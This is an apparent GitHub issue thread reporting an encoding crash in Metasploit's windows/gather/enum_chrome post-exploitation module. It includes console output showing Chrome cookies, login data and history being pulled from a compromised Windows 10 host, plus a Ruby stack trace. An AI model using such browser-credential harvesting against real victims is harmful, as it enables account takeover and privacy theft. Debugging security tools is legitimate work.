### ISSUE TITLE
windows/gather/enum_chrome => Encoding::InvalidByteSequenceError

### ISSUE THREAD

**Issue by Radrigo** [rapid7/metasploit-framework#9395]
**Hello.**

MSF version: metasploit v4.16.31-dev-9fbddd6474
OS system: Debian (Kali)
Target OS: Windows 10 x64 (Build 16299)
Target system language : ru_RU

## Steps to reproduce
```

msf post(windows/gather/enum_chrome) > run

[*] Impersonating token: 8788
[*] Running as user 'xxxxx\xx'...
[*] Extracting data for user 'xx'...
[+] Downloaded Web Data to '/home/ppp/.msf4/loot/20180111171900_default_127.0.0.1_chrome.raw.WebD_694486.txt'
[+] Downloaded Cookies to '/home/ppp/.msf4/loot/20180111172024_default_127.0.0.1_chrome.raw.Cooki_105879.txt'
[+] Downloaded History to '/home/ppp/.msf4/loot/20180111172057_default_127.0.0.1_chrome.raw.Histo_609670.txt'
[+] Downloaded Login Data to '/home/ppp/.msf4/loot/20180111172216_default_127.0.0.1_chrome.raw.Login_403636.txt'
[+] Downloaded Bookmarks to '/home/ppp/.msf4/loot/20180111172239_default_127.0.0.1_chrome.raw.Bookm_636209.txt'
[+] Downloaded Preferences to '/home/ppp/.msf4/loot/20180111172258_default_127.0.0.1_chrome.raw.Prefe_121840.txt'
[-] Post failed: Encoding::InvalidByteSequenceError "`\xDE" on UTF-16LE
[-] Call stack:
[-]   /home/elpadre/git/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/library_helper.rb:63:in `encode'
[-]   /home/elpadre/git/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/library_helper.rb:63:in `uniz_to_str'
[-]   /home/elpadre/git/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb:334:in `block in process_function_call'
[-]   /home/elpadre/git/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb:322:in `each_pair'
[-]   /home/elpadre/git/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb:322:in `process_function_call'
[-]   /home/elpadre/git/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb:86:in `call_function'
[-]   /home/elpadre/git/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/library_wrapper.rb:25:in `method_missing'
[-]   /home/elpadre/git/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:111:in `decrypt_data'
[-]   /home/elpadre/git/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:159:in `block (3 levels) in process_files'
[-]   /home/elpadre/git/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:156:in `each'
[-]   /home/elpadre/git/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:156:in `block (2 levels) in process_files'
[-]   /home/elpadre/git/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:152:in `map!'
[-]   /home/elpadre/git/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:152:in `block in process_files'
[-]   /home/elpadre/git/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:136:in `each'
[-]   /home/elpadre/git/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:136:in `process_files'
[-]   /home/elpadre/git/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:327:in `block in run'
[-]   /home/elpadre/git/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:324:in `each'
[-]   /home/elpadre/git/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:324:in `run'
[*] Post module execution completed
msf post(windows/gather/enum_chrome) >
```

**Comment by bolahanna44** [comment]
hello have you found a solution for this ? i have the same problem ?!!
